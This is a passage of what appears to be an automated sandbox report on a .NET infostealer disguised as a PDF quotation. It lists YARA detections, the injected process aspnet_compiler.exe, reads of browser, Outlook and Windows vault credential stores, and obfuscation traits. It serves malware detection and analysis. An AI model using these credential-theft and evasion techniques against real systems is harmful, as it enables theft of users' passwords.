                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000000.1636431232.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameFmfcpx.exe8 vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2246378336.0000000009090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUacfwlw.dll" vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.00000000042C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUacfwlw.dll" vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2221759738.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamea2008e0c-49e9-4951-9077-6b05297ad1bf.exe4 vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B95000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeBinary or memory string: OriginalFilenameFmfcpx.exe8 vs QUOTATION_APRQTRA031244#U00faPDF.scr.exe
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.2d48e7c.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, N1EZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, N1EZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, N1EZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, N1EZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, arzrv9AWTXK.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, arzrv9AWTXK.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, InmxgXcIi8d.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, InmxgXcIi8d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_APRQTRA031244#U00faPDF.scr.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: NULL
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: aspnet_compiler.exe, 00000004.00000002.2896066000.000000000312D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeReversingLabs: Detection: 52%
                      Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe "C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe"
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003BA1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2245901969.0000000007490000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003BA1000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2245901969.0000000007490000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, Program.cs.Net Code: Main System.AppDomain.Load(byte[])
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.7490000.15.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4601c10.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4601c10.11.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4601c10.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4601c10.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4601c10.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4781400.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.44f9dd0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.70f0000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4781400.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4599df0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.4651c30.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2242734994.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.00000000044F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2222485023.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION_APRQTRA031244#U00faPDF.scr.exe PID: 5356, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_05C006E0 push eax; ret 0_2_05C006ED
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_0720A580 push eax; retf 0_2_0720A581
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_0720232B push FFFFFF8Bh; iretd 0_2_0720232F
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_07202200 push FFFFFF8Bh; iretd 0_2_07202207
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_072021B4 push FFFFFF8Bh; ret 0_2_072021B6
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_07483F16 push 5D9001E8h; ret 0_2_07483F1B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_01630CA1 push edi; retf 4_2_01630CAA
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
